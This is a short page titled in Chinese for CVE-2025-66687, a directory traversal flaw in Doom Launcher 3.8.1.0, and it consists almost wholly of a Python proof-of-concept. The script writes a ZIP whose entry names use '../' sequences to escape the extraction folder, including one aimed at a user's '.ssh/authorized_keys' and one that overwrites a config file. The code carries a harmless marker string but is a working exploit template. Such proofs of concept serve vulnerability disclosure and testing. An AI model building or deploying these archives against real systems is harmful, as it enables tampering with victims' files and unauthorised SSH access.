CVE-2025-66687 Doom Launcher目录遍历漏洞

#!/usr/bin/env python3 """ CVE-2025-66687 PoC - Doom Launcher Directory Traversal This PoC generates a malicious ZIP file that exploits the path traversal vulnerability during game file extraction in Doom Launcher 3.8.1.0 """ import zipfile import os import sys def create_malicious_zip(output_path): """ Create a malicious ZIP file with path traversal payloads """ # Path traversal payload to write file outside target directory malicious_filenames = [ "../../../test.txt", # Basic traversal to write in parent directories "../config_backup.ini", # Overwrite config in parent directory "../../../.ssh/authorized_keys", # Attempt to write SSH keys (if .ssh exists) "startup.txt" # Normal file in target directory ] malicious_content = b"This file was created via CVE-2025-66687 Directory Traversal exploit" with zipfile.ZipFile(output_path, 'w', zipfile.ZIP_DEFLATED) as zipf: for filename in malicious_filenames: zipf.writestr(filename, malicious_content) print(f"[+] Added malicious entry: {filename}") print(f"[+] Malicious ZIP file created: {output_path}") print("[*] When extracted by vulnerable Doom Launcher, files will be written outside target directory") def verify_zip_content(zip_path): """Verify the contents of the created ZIP file""" print("\n[*] ZIP file contents:") with zipfile.ZipFile(zip_path, 'r') as zipf: for info in zipf.infolist(): print(f" - {info.filename}") if __name__ == "__main__": if len(sys.argv) > 1: output_file = sys.argv[1] else: output_file = "exploit_cve_2025_66687.zip" create_malicious_zip(output_file) verify_zip_content(output_file)